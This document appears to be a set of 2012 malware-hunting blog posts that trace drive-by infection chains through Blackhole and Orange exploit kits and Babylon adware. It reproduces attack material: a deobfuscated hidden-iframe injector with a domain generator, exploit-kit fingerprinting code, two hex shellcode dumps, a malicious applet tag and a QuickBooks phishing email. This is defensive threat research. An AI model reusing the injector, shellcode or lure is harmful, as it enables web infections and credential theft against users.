Malware Hunting - Write Reports as Hunting PoC

I was not joking when I said to make war against malware directly,
this weekend is going to be a bad time for those infectors in the world.
I got some blocking and have some portscanning too, good!

And I am doing it in real, yet, Iwill  keep on sharing on what I personally find, 
I shared what I can share only, yet there's a lot of stuffs I just cannot share.

Below is my bloglist of what I investigated in the first 12hours.

Let's do our part well, let's battle this malwares this weekend.
To those who cannot join or support, please stop mocking! 
Support us. Hint us. Advice us!

To the members of MalwareMustDie,
Friends, please write any findings, any analysis, anything,
to the pastebin, to the blogs and expose malware scheme as many as you can,
in anyway you can. 
It is hard to do it, but I did it, means you can do it better,
I wrote those in english even harder for me yet I did some within a day.
So let's hunt together & expose more malwares!

#MalwareMUSTdie! 

Read More

Suspicious Movement in ASN40034 (infector to tr2.4voip.biz & fwdservice.com)

It's beginning from infected hosting homepage of hxxp://dansenbijjansen.com/
It is a good honest site. Sadly, it's having the suspicious code at 
hxxp://dansenbijjansen.com/foto/index.php?


I downloaded to examine to find the below JS/Code:
＜script>el=document.createElement("div");try{a}catch(qq)
{el.appendChild(document.createElement("p"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"),el.childNodes[1]);with(el)
{appendChild(document.createTextNode("eva"));}}
k=el.lastChild.nodeValue;ar="A4 2E\"lTb?we 
Cy";ar2="R8c8c140c116c192c96c148c176c160c128c76c44c168c92c132c172c44
c92c16c24c44c76c44c168c92c68c80c200c28c52c172c124c52c76c44c96c152c32
c176c148c200c152c156c84c108c100c156c88c8c8c8c140c116c104c52c76c44c104
c96c156c180c8c8c120c192c44c24c68c44c192c88c8c8c8c148c176c160c128c76
c44c168c92c132c40c104c140c92c44c96c20c48c140c116.....and so on....

↑was easily to deobfuscate to find the below iframer...
＜iframe src='hxxp://tr2.4voip.biz/in.cgi?2' width='10' height='10' style=
'visibility:hidden;position:absolute;left:0;top:0;'＞＜/iframe＞

Which making me checking the hxxp://tr2.4voip.biz/in.cgi?2 to find-
the multiple malicious links as per coded below:


↑The above links is obviously for the purpose to make sure users are -
redirected to the below HTML file with another JS code:


It will lead us to the link of:
hxxp://fwdservice.com/main.php?dmn=4voip.biz&folio=7POYGN0G2&gkwrf&p_bkt=

What's this? We have many reference about it in the urlquery below:


This is actually a url forwarder service used to redirect request to some-
other URL for the downloading or etc purpose. I checked to the recorded URL-
And found the format of the query like:
hxxp://fwdservice.com/main.php?dmn=lejebolig.net&folio= \
7POJ4E717&gkwrf=hxxp://www.ansa.no/ANSAland/Danmark/Lokallag/\
Kobenhavn/A-bo-i-Kobenhavn/Finne_bolig_i_Kobenhavn/&p_bkt=
 Or....
hxxp://fwdservice.com/main.php?dmn=sniegul.com&folio=
7POYGN0G2&gkwrf=http://priv.ckp.pl/moonforge/&p_bkt= 

In our case with the certain ticket (folio=7POYGN0G2) and - 
domain (dmn=dmn=4voip.biz) forwarded us to special path in 4voip.biz host.
Be free to check and analyzed further of what you can get from that host.

The interesting part is tr2.4voip.biz and fwdservice.com are in the -
same network :


With sharing same IP address with lame malicious domain like:
netsecur.com
wwwfaceboko.com
yourmoneybox.net
Blacklisting 4voip.biz and fwdservice.com will be a nice idea!

Read More

hphosts: Updated 01-09-2012

The hpHOSTS Hosts file has been updated. There is now a total of 169,808 listed hostsnames.If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)Latest Updated: 01/09/2012 03:45Last Verified: 01/09/2012 00:00Download hpHosts now!http://hosts-file.net/?s=Download

Read More

Understanding Recent Blackhole Exploit Kit's "js.js" Infector Trend for Smart Hunting

When I hunt honeypot blackhole exploit kit (BHEK) blacklist 
for infections I often come to see some URLs ending up with js.js on it.
The file will be the same in extention but actually it has differences in 
contents depend on malware epidemic exploitation / how the BHEK want to 
infect users at that time. 

Previously, the trend I found in the js.js code was a mere and 
common injected obfuscation script like :

 or 

↑It was obvious that we must crack this code for getting to the next -
hop of the malware source.

But the recent js.js that I found was mostly/practically a javascript calls to 
another text file contains "document.location=" of a certain blackhole sites.
The moral of this writing is, we can nail bigger stuffs / new epidemic by 
understanding the parameter produced by the recent terms.

Allow me to demonstrate this theory. Let's see the below real infected urls:
209.215.118.13  hXXp://209.215.118.136/fFDrSXRM/js.js
200.219.245.75  hXXp://aainstalacoeseletricas.com.br/3XmimsHL/js.js
184.107.196.218 hXXp://www.celucentro.com.co/qgmZiWk7/js.js
82.98.87.89     hXXp://wilde.webprojekt.ch/v8bPW1U4/js.js
85.214.26.149   hXXp://advantage-media-sports.com/26MxXngr/js.js
194.170.160.46  hXXp://www.admirals.ae/mC9o9rRd/js.js

This will connect you to the certain "document.location=" below:
document・location='hXXp://209.59.222.20/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';
document・location='hXXp://50.116.54.37/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';
document・location='hXXp://173.230.130.248/pxyk80ujzb03h.php?y=078eb263358008ea';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=gawit01smae175m0';
document・location='hXXp://69.163.40.128/pxyk80ujzb03h.php?y=pju39rz4qpnogd84';

The lesson teach us to understand the curent trend of parameter used in 
blackhole, which is :
/pxyk80ujzb03h.php?y=

Let's proof this theory by searching the above strings in the -
malware domain list site:


↑*) Click to enlarge the pic
↑Voila! We got ourself a new hunting field. :-) 
PS: This posts is dedicated to fellow malware hunters
#MalwareMustDie!

Read More

Pseudo Randoms Infector URL - An idea to grep it (a logical bug to be used)

A while ago we have the PseudoRandom infector spreader via Blackhole.
Lucky me to just bumped into one, I thought it was already wiped out clean.
Here's the story of it.

I got the hint of the infected url via spam by my own spam filter.
Here's the url:
hxxp://www.strow.es/proyectos/destacado.html

As usual fetch it:
--03:48:46--  hxxp://www.strow.es/proyectos/destacado.html
           => `destacado.html'
Resolving www.strow.es... 212.59.199.22
Connecting to www.strow.es|212.59.199.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22,808 (22K) [text/html]
100%[====================================>] 22,808        29.32K/s
03:48:48 (29.25 KB/s) - `destacado.html' saved [22808/22808]


Let's see the timestamp of it...
-rwx------   1 r00t b33r 22808 Aug  8 02:29 destacado.html
↑Ah, the old infected files who got leftover..

is a common HTML file, nothing special except it was injected by JavaScript,
the code was after the tag  like below:

You can see the code in pastebin --->>>>[HERE]

This is actually a PseudoRandom JS/Code with the eval() value below,
of course is not as per it is.. you cannot run it by paste it.
function nextRandomNumber(){
  var hi = this .seed / this .Q;
  var lo = this .seed % this .Q;
  var test = this .A * lo - this .R * hi;
  if (test > 0){
    this .seed = test;
  }
  else {
    this .seed = test + this .M;
  }
  return (this .seed * this .oneOverM);
}
function RandomNumberGenerator(unix){
  var d = new Date(unix * 1000);
  var s = Math.ceil(d.getHours() / 3);
  this .seed = 2345678901 ＋ (d.getMonth() * 0xFFFFFF) + 
               (d.getDate() * 0xFFFF) + (Math.
  round(s * 0xFFF));
  this .A = 48271;
  this .M = 2147483647;
  this .Q = this .M / this .A;
  this .R = this .M % this .A;
  this .oneOverM = 1.0 / this .M;
  this .next = nextRandomNumber;
  return this ;
}
function createRandomNumber(r, Min, Max){
  return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
  var rand = new RandomNumberGenerator(unix);
  var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
  var str = '';
  for (var i = 0; i < length; i ++ ){
    str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  }
  return str ＋ '.' + zone;
}
setInterval(function (){
  try {
    if (typeof iframeWasCreated == "undefined"){
      var unix = Math.round( + new Date（）/ 1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "hxxp://" + domainName + "/in.cgi?15");
      ifrm.style.width = "0px";
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
      iframeWasCreated = true;
    }
  }
  catch (e){
    iframeWasCreated = undefined;
  }
}
, 100);
The paste of code is in here===>>>>[HERE]

Well this will lead you to the below landing page:
hxxp://xkqaiqqirreqaqwd.ru/in.cgi?15
↑But don't get upset since nothing is in there anymore ;-)

My point is to you to see what they code in PseudoRandom.
See the code well and and you know how it works. 
The stupid thing of using PseudoRandom is there is no "really" random urls,
You have to leave something to be merged as url.
For the case of this sample is easy to grep "/in.cgi?" and see what happened in Domain List.

Read More

What can Exploit Kit do & drop? Full story of spam to malwares

I am following the steps of infection of ONE spam mail which lead to a sophisticated exploit kit which dropped MANY malwares, during infection it was automatically detecting your browser and PC to find the best mess to drop/infect you beforehand.

The dropped malwares collection is at below pic:

↑ As you can see all is in the today's date, is fresh. Don't worry the sample is out there, grab them all.
This threat is so nasty so I think I need to blog it. Below is the report. 

I believe some of you received or seeing mail like this:
Date:      Tue, 28 Aug 2012 11:04:30 -0400
From:      "Intuit Payroll Services" 
Subject:      QuickBooks Security Update

You will not be able to access your Intuit QuickBooks 
without updated Intuit Security Tool (IST™) after 31th of August, 2012.

You can update Intuit Security Tool here.

After a successful download please run the setup for an automatic 
installation, then login to Intuit Quickbooks online to check that 
it is working properly.

This email was sent from an auto-notification system that 
can't accept incoming email. Please don't reply to this message.

You have received this business communication as part of our efforts to fulfill 
your request or service your account.
You may receive this and other business communications from us 
even if you have opted out of marketing messages.

Terms, conditions, pricing, features, and service options are 
subject to change. View our complete Terms of Service.

If you click the term and condition you will access the below link:
hxxp://babyu.onedaynet.co.kr/JHF0X3B/index.html

After accessing the url you will get the malicious index.html like below:
＜html＞
＜h1＞WAIT PLEASE＜/h1＞
 ＜h3＞Loading...＜/h3＞
 ＜script type="text/javascript" 
          src="hXXp://66.242.140.34/LA5S92vH/js.js"＞＜/script＞
＜script type="text/javascript" 
          src="hXXp://freerobinfly.com/sS5N3rtK/js.js"＞＜/script＞
＜script type="text/javascript" src="
          hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js"＞＜/script＞

＜/html＞
↑It is a not-good index.html, let's check in VirusTotal :
MD5: 　　　　　　5d323254ee15f460a6bd6f7262cd3c42
File size:       327 バイト ( 327 bytes )
File name:       output.2145601.txt
File type:       HTML
Tags:            html
Detection ratio: 18 / 42
Analysis date:   2012-08-31 12:47:34 UTC 
URL:             [CLICK]

If you trace the three urls written in that HTML,
it will lead you to the same javascript file. I traced it like this:
--00:27:31--  hXXp://66.242.140.34/LA5S92vH/js.js
           => `js.js'
Connecting to 66.242.140.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78            --.--K/s
00:27:32 (2.72 MB/s) - `js.js' saved [78/78]

--00:27:40--  hXXp://freerobinfly.com/sS5N3rtK/js.js
           => `js.js.1'
Resolving freerobinfly.com... 74.208.242.135
Connecting to freerobinfly.com|74.208.242.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78            --.--K/s
00:27:41 (371.47 KB/s) - `js.js.1' saved [78/78]

--00:27:47--  hXXp://ftp.santoscortereal.com.br/wBWnt3vJ/js.js
           => `js.js.2'
Resolving ftp.santoscortereal.com.br... 200.98.197.17
Connecting to ftp.santoscortereal.com.br|200.98.197.17|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [application/x-javascript]
100%[====================================>] 78            --.--K/s
00:27:48 (1.92 MB/s) - `js.js.2' saved [78/78]

Let's see what's inside of this js.js
document・location='hXXp://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea';
↑Another redirection. OK. This is no good too, let7s check in Virus Total again:
MD5:              e2525763bdf95e9a33001fd231ee109e
File size:        78 バイト ( 78 bytes )
File name:        js.js
File type:        Text
Detection ratio:  3 / 42
Analysis date:    2012-08-31 15:59:42 UTC ( 0 分 ago ) 
URL:              [CLICK]
↑OK, at least three antivirus product is detected it.

Let's grab it too and see the inside of it then ↓
--00:29:18--  http://50.116.44.177/pxyk80ujzb03h.php?y=078eb263358008ea
           => `pxyk80ujzb03h.php@y=078eb263358008ea'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
    [   <=>                               ] 69,236       115.00K/s
00:29:20 (114.70 KB/s) - `pxyk80ujzb03h.php@y=078eb263358008ea' saved [69236]

And the inside is obfuscation code like this 

↑This is definitely not good at all, let's check it in Virus Total first↓
MD5:             643e431692f6ce0eaf4bb4bdb1e0ed4a
File size:       67.6 KB ( 69236 bytes )
File name:       pxyk80ujzb03h.php@y=078eb263358008ea
File type:       HTML
Detection ratio: 2 / 42
Analysis date:   2012-08-31 16:18:34 UTC ( 0 分 ago ) 
URL:             [CLICK]
Oh, looks like I am the first who uploaded this sample.
Well at least NOW at least we still have 2 antivirus product detected it.

If you deobfuscated it right you will have below result, 
one is the below code:
document・write('＜center＞Waiting for redirect...＜/center＞');
function end_redirect(){
  window・location.href = 'hxxp://davidkellett.co.uk/updateflashplayer.exe';

And the other is a plugin detect in Javascript:
 var PluginDetect = {
    version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
      return function (){
        c(b, a)　＜etc etc＞。。。。。

It detected your OS:
c.OS = 100;
if (b){
  var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 
  21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
  , 100];
  for (f = d.length - 2; f >= 0; f = f - 2){
    if (d[f] && new RegExp(d[f], "i").test(b)){
      c.OS = d[f + 1];
      break 

It sensing your browser user agent for the right drops:
var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "", 
 b = a.platform || "", h = a.product || "";
 c.initObj(c, ["$", c]);
 for (fin c.Plugins){
   if (c.Plugins[f]){
     c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
   }

Sensing the element to install messes to your browser:
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
"body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : 
null      ;
c.ActiveXEnabled = false;
if (c.isIE){
  var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", 
  "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", 
  "Scripting.Dictionary", "wmplayer.ocx"];
  for (f = 0; f < j.length; f ++ ){
    if (c.getAXO(j[f])){
      c.ActiveXEnabled = true;
      break 

And Checking which browser you have
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : 
"0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? 

Very interesting to know that this code is considering to use Java against you:
DTK : {
 $ : 1, hasRun : 0, status : null, VERSIONS : [], version : "", HTML : null, 
 Plugin2Status : null, classID : ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", 
 "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"], mimeType : [
 "application/java-deployment-toolkit", 
 "application/npruntime-scriptable-plugin;DeploymentToolkit"], disabled : 
 function (){
   :
   :
   :
 var m, s = "1,4,2,0", g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + 
(a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
for (h = 0; h < f.JavaVersions.length; h ++ ){
  d = f.JavaVersions[h];
  n = "JavaPlugin." + d[0] + "" + d[1];
  b = d[0] + "." + d[1] + ".";
  for (l = d[2];
  l >= 0; l -- ){
    r = "JavaWebStart.isInstalled." + b + l + ".0";
    if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 &&! e.getAXO

Well, is sphisticated isn't it? The full code of deobfs are here ====>>> [CLICK]

OK, let's get further. The deobfs code above also brings you the shellcode below:

41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81 
e9 57 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff 
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3 
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04 
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3 
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3 
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4 
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b 
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3 
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3 
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b 
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7 
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28 
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d 
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab 
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c 
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c 
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40 
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28 
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21 
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28 
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e 
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3 
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42 
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2 
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07 
58 40 5c 5c 58 12 07 07  1d 18 06 19 19 1e 06 1c 
1c 06 19 1f 1f 07 58 06  58 40 58 17 4e 15 18 19 
1c 18 18 0e 4d 15 19 28  28 00 

This will lead you to the downloading file from:
hxxp://50.116.44.177/p.php?f=01400&e=1

So we have two new download URL that we can assumed is payload, let's check,
The first URL is:
--00:34:48--  hxxp://davidkellett.co.uk/updateflashplayer.exe
           => `updateflashplayer.exe'
Resolving davidkellett.co.uk... 209.235.144.9
Connecting to davidkellett.co.uk|209.235.144.9|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 371,112 (362K) [application/x-msdownload]
100%[====================================>] 371,112       72.82K/s    ETA 00:00
00:34:55 (52.38 KB/s) - `updateflashplayer.exe' saved [371112/371112]

In virus Total the score is 11/42:
MD5:            4c22e00d38a44b810f6103ec6837b137
File size:      362.4 KB ( 371112 bytes )
File name:      updateflashplayer.exe
File type:      Win32 EXE
Tags:          peexe
Detection ratio:11 / 42
Analysis date:  2012-08-31 15:29:23 UTC ( 7 分 ago ) 
URL:            [CLICK]
↑It looks like Zbot. I am not expert w/ naming buff, 
Anyway malware details I wrote in Virus Total Page..

The other drops goes to:
--00:36:20--  http://50.116.44.177/p.php?f=01400
           => `p.php@f=01400'
Connecting to 50.116.44.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 177,576 (173K) [application/x-msdownload]
100%[===================================> ] 177,576      147.57K/s
00:36:22 (147.13 KB/s) - `p.php@f=01400' saved [177576/177576]

This is also a bad stuff, in Virus Total only 1(one) vendor detected it.
MD5:  096a79434392461517907c6f62b27cd1
File size:      173.4 KB ( 177576 bytes )
File name:      sample
File type:      Win32 EXE
Tags:          peexe
Detection ratio:1 / 42
Analysis date:  2012-08-31 15:37:57 UTC ( 1 時間, 23 分 ago ) 
URL:            [URL]
↑Is a Trojan, runs as daemon/processes, reads keyboard & screen, 
worse of all is faking Microsoft binary with the yesterday compilation day.

Read More

Payloads URI die hard - Blackhole Exploit Kit

(Contents is regularly updated for sharing the closest possible to the fact)
Some MDL already informed and publish these URLs, so I have no reason to hold anymore:

payloads:

(1) hXXp://mxcwqdkbphcx.lookin.at/main.php?page=c9ee61ed42809775
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                                classical one↑

(2) hXXp://02e9126.netsolhost.com/nfjviq3D/index.html
                                 ^^^^^^^^^^^^^^^^^^^^
                              ↑Good trick, don't be fooled with index.html
(Information: this is actually iframer lead to BHEK at the below link)

    hXXp://66.175.222.25[/]pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                            ↑Not usual one, look at the parameter at php file

(3) hXXp://crane.co.th/YabymY6p/index.html
                      ^^^^^^^^^^^^^^^^^^^^
                   ↑see the above randomized subdir?

Conclusion:
You can set almost every infection scheme in blackhole interface.
yet the characteristic is still there.

Note;
This page is here because of the team work of malware researchers.
Thank you for those who contributes the contents, to those who corrected and advice,
for those who to read and share, and God & prayers bless them who take 
direct action straight to these threat.

BTW, No, I am telling you #MalwareMustDie is not selling crap.

Read More

(Updated) Beware of the BABYLON, Adware that spreads like Exploit Kit

A lot of you know about Babylon Adwares, don't you?
We ignored these guys so long. We thought they will raise no threat. Now they are spreading "with" the good evil-distribution scheme (If I cannot say it infection)
Realizing the investigated network they have, Babylon now is an AdWare yet spreads like a Exploit Pack. We should raise market awareness of this trend, who knows one day malwares came and ride under babylon scheme to become a new epidemic vector..
Please read the PoC below:

We snip a research and found the url like below:
>> --12:23:06--
>> http://www.destorage.info/installmate/php/get_cfg.php?step_id=1
>>            => `get_cfg.php@step_id=1'
>> Resolving www.destorage.info... 46.165.199.26
>> Connecting to www.destorage.info|46.165.199.26|:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 6,614 (6.5K) [text/html]
>> 100%[====================================>] 6,614         --.--K/s
>> 12:23:07 (1.07 MB/s) - `get_cfg.php@step_id=1' saved [6614/6614]

Got curious so I see the inside↓
>> blah\GnuWin32\bin\dump>cat "get_cfg.php@step_id=1"
>>  ■[ I n s t a l l e r ]
>>  P u b l i s h e r N a m e = " P r e m i u m "
>>  P r o d u c t N a m e = " S e t u p "
>>  P r o d u c t V e r s i o n = " 1 . 0 "
>>  P r o d u c t C o d e = " { 1 7 E B 6 D D C - 1 5 2 2 - 7 2 F 9 - D 5 A E
>> - 7 B
>>  1 F C 1 C 4 8 7 C E } "
>>  P u b l i s h e r I D = " 0 "
>>  S o u r c e I D = " 0 "
>>  P a g e I D = " 0 "
>>  A f f i l i a t e I D = " % I n s t a l l e r _ A f f i l i a t e I D % "
>>  I n s t a l l e r I D = " 0 "
>>  V i s i t o r I D = " 0 "
>>  L o c a l e = " e n "
>>  D a t e = " 2 0 1 2 / 0 8 / 3 1 "
>>  T i m e = " 3 : 2 3 : 0 6 "
>>  S h o w I n T a s k b a r = " 1 "
>>  H i d e S c r e e n s = " 0 "
>>  I n s t a l l e r M o d e = " "
>>
>>  [ S e r v e r ]
>>  I D = " 0 "
>>  L o c a t i o n = " D E "
>>
>>  [ U s e r I n f o ]
>>  G e o L o c a t i o n = " J P "
>>  I P A d d r e s s = " 1 2 1 . 3 . 1 7 3 . 1 9 1 "
>>  W e b B r o w s e r = " 0 "
>>
>>  [ R n d G e n ]
>>  P e r c e n t a g e = " 2 1 "
>>
>>
>>  [ S c r e e n 7 5 ]
>>  T i t l e = " S e t u p "
>>  B u t t o n 1 = " Y e s "
>>  B u t t o n 2 = " & N o "
>>  L a b e l 1 = " A r e   y o u   s u r e ? "
>>    :
>>    :
>>  etc

FYI, this server is serving babylon adware and is spreading either with its "kinda" exploit 
pack, or using Exploit Pack method. So below is conclusion:
1. The infector url is using exploit pack format.
2. Definitely logging the PC information during installation via browser and took
   snapshot of it in the server
3. Backdooring the installer w/o user's permission

Analysis:

Good researcher friends who I promised confidentiality was advising the site also comprised with a "suspected" malwares (I didn't analyze it yet) as follows:

> 46.165.199.26/v9/
> 46.165.199.26/v10/  VirusTotal Check is HERE-->>>[CLICK]
> 46.165.199.26/v14/
> 46.165.199.26/v52/
> 46.165.199.26/v209/
Additional/updated Note:
↑I am following the reported downloaded program described in above (VT Report).
This file is explaining to us why the PC information got uploaded to server.
File: WxDownload.exe 68ee6e35ef7f495be727131dc4ef5ed9
It is a binary installer using Tarma InstallMate 7 which like usual installer it drops:
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setup.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setupx.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.exe
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.ico
C:\Document..\Local Settings\Temp\Tsu5F686192.dll
(I don't go to details on it yet.....)
↑It is "assumed" those will start install nasty adwares in your PC and so on..
(I am sorry for not going into detail on it either)

My point is, this installer sends your PC data to motherships as per below;
DNS QUERRIES:
www.reportde.info IN A +
www.destorage.info IN A +
www.reportnl.info IN A +
www.nlstorage.info IN A +

HTTP POSTS:
www.reportde.info POST 
www.reportnl.info POST
values: "/installmate/php/track_installer_products.php?installer_version=75 HTTP/1.1"

HTTP REQUESTS:
www.destorage.info GET (3 times)
www.nlstorage.info GET (3 times)
values =
/installmate/php/get_cfg.php?
step_id=1&
installer_id=5040612c774655.01371722&
publisher_id=10&
source_id=0&
page_id=0&
affiliate_id=0
&geo_location=JP&
locale=EN&
browser_id=4 HTTP/1.1
In the HTTP/POST part it sends the installer version info's, maybe is OK, but..
In the HTTP/GET part it sends your GeoIP Location, PC local Lang, Browser information,
and of course your IP addresses. It is a PoC proven why records in the server exists.

OK, research continues to the detected IP addresses of Babylon spreader services, 
It was detected the multiple directories to be used to download links distribution:
> Fast check showed :
> /v9/
> /v17/
> /v14/
> /v16/
> /v20/
> /v21/
> /v10/
> /v26/
> /v37/
> /v33/
> /v27/
> /v34/
> /v31/
> /v43/
> /v46/
> /v47/
> /v48/
> /v45/
> /v51/
> /v42/
> /v58/
> /v56/
> /v52/
> /v54/
> /v53/
> /v57/
> /v62/
> /v68/
> /v64/
> /v66/
> /v69/
> /v70/
> /v72/
> /v67/
> /v75/
> /v71/
> /v73/
> /v78/
> /v76/
> /v74/
> /v77/
> /v79/
> /v82/
> /v80/
> /v81/
> /v87/
> /v86/
> /v88/
> /v84/
> /v83/
> /v98/
> /v94/
> /v96/
> /v95/
> /v99/
> /v97/
>
> I guess you can try 1xx, 2xx, 3xx 
Other researcher detected the mirroring scheme on 46.165.199.26 to same segment IP ADDR:
46.165.199.26/v14/      301720
46.165.199.3/v14/       301720
46.165.199.25/v14/      301720
Which some similarities of downloaded files are detected:
> http://95.211.152.157/v17/    299048
> filename="BCool.exe"
> http://95.211.150.1/v17/      299048
> filename="BCool.exe"
> http://95.211.152.156/v17/    299048
> filename="BCool.exe"

As you can see, adware is the thing that we cannot just be ignored. This adware's distributor starts to play nasty way & to victimize innocent people.
Be free to put your comment to add he current information.

Read More

Undetected Orange Exploit Kit Infector

If you see the infected page with this code:

Don't be surprised for being undetected:

This is the orange exploit pack infector HTML analyzed in ---->>> [ H E R E ]

Read More

What Orange Exploit Kit Dropped

It is an infected HTML with the orange exploit pack.
I am following the @kafeine report of it.

Source: hxxp://breitlingline.biz/

With the infector HTML/IFrame

＜iframe src="hxxp://petrol.thehickorymotormile.com:8382/AZAgQw?wITGN=78" width=0 height=0 frameborder=0＞＜/iframe＞

The VT detection is very low = 1/41

Java exploit of CVE-2008-5353 and CVE-2012-0507 was detected at the iframe redirected url. Giving you malicious applet like:

＜html＞＜head＞＜/head＞
＜body＞
＜applet archive="24" code="WCfn.class" width="8" height="7"＞＜param name="ur34" value="103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52"＞＜param name="enm3" value="69!77!70!117!67!86!77!45!100!119!100"＞＜/applet＞
＜p＞HKKatmqLjj＜/p＞＜br＞
＜embed src="255" width="518" height="364"＞
＜/body＞

With taking you to the execution of the below shellcodes:

4c 20 60 0f a5 63 80 4a 3c 20 60 0f 96 21 80 4a 90 1f 80 4a 30 
90 84 4a 7d 7e 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 71 88 80 4a 64 20 60 0f 00 04 00 00 41 41 41 
41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 
8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b 
8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00 
75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58 
